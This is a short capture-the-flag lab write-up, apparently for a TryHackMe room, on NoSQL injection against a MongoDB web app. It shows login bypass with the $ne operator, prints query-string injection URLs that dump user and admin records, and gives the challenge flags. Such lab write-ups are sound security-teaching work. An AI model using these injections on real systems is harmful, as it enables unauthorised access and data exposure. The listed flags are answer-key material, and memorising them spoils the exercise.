# \[Day 7] Migration Without Security

Logging into the server with the given credentials, I was able to interact with the MongoDB and retrieve the first flag.

![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MdOcy1ba9EGn2GQ7ELK%2Fuploads%2FKHrMQH3LMvLnijqOyHDX%2Fimage.png?alt=media\&token=b0f52f40-af2b-42db-a7d7-3133213f9f70)

{% hint style="success" %}
Interact with the MongoDB server to find the flag. What is the flag?

* THM{8814a5e6662a9763f7df23ee59d944f9}
  {% endhint %}

The following page is being served on port 80/HTTP

![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MdOcy1ba9EGn2GQ7ELK%2Fuploads%2FCx8tqpngHVbJ6eGzCZVF%2Fimage.png?alt=media\&token=a5b1ef2c-71df-48fb-ba10-7526cbc66276)

**Useful MongoDB Operators**

```
$eq - matches records that equal to a certain value

$ne - matches records that are not equal to a certain value

$gt - matches records that are greater than a certain value.

$where - matches records based on Javascript condition

$exists - matches records that have a certain field

$regex - matches records that satisfy certain regular expressions.
```

Bypassing the login page is as simple as using the `$ne` operator on the password field.

![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MdOcy1ba9EGn2GQ7ELK%2Fuploads%2FO2O2MCgYi7JblyXLF1gQ%2Fimage.png?alt=media\&token=968e38e3-8ba1-442e-99ce-68358dec0cba)

![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MdOcy1ba9EGn2GQ7ELK%2Fuploads%2Ft877kWCnvEhf6EqVkNHO%2Fimage.png?alt=media\&token=2d394aa8-ee49-467a-8031-66de5983e2b4)

![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MdOcy1ba9EGn2GQ7ELK%2Fuploads%2F794dNtA9zWcVEbWkp368%2Fimage.png?alt=media\&token=759fda70-60b4-4314-bd95-7587fa0a4534)

We're in.

![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MdOcy1ba9EGn2GQ7ELK%2Fuploads%2FkAoYnSZBhFYtGvUOTyCk%2Fimage.png?alt=media\&token=a7e479f0-9dfb-41ec-9e6d-397af04a23d7)

{% hint style="success" %}
THM{b6b304f5d5834a4d089b570840b467a8}
{% endhint %}

```
10.10.121.120/search?username[$ne]=admin&role=guest
```

![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MdOcy1ba9EGn2GQ7ELK%2Fuploads%2F4VMKcuOjv2wrlyfIyVUb%2Fimage.png?alt=media\&token=0214a6d2-00a6-407c-971d-eab570ec230e)

{% hint style="success" %}
Once you are logged in, use the gift search page to list all usernames that have guest roles. What is the flag?

* THM{2ec099f2d602cc4968c5267970be1326}<br>
  {% endhint %}

```
http://10.10.121.120/search?username=mcskidy&role[$ne]=guest
```

![](https://561482365-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MdOcy1ba9EGn2GQ7ELK%2Fuploads%2FMyiyvv80dRyC3tcH9XRB%2Fimage.png?alt=media\&token=39c8db84-5541-46ab-a9a9-235213e39d61)

{% hint style="success" %}
Use the gift search page to perform NoSQL injection and retrieve the mcskidy record. What is the details record?

* ID:6184f516ef6da50433f100f4:mcskidy:admin
  {% endhint %}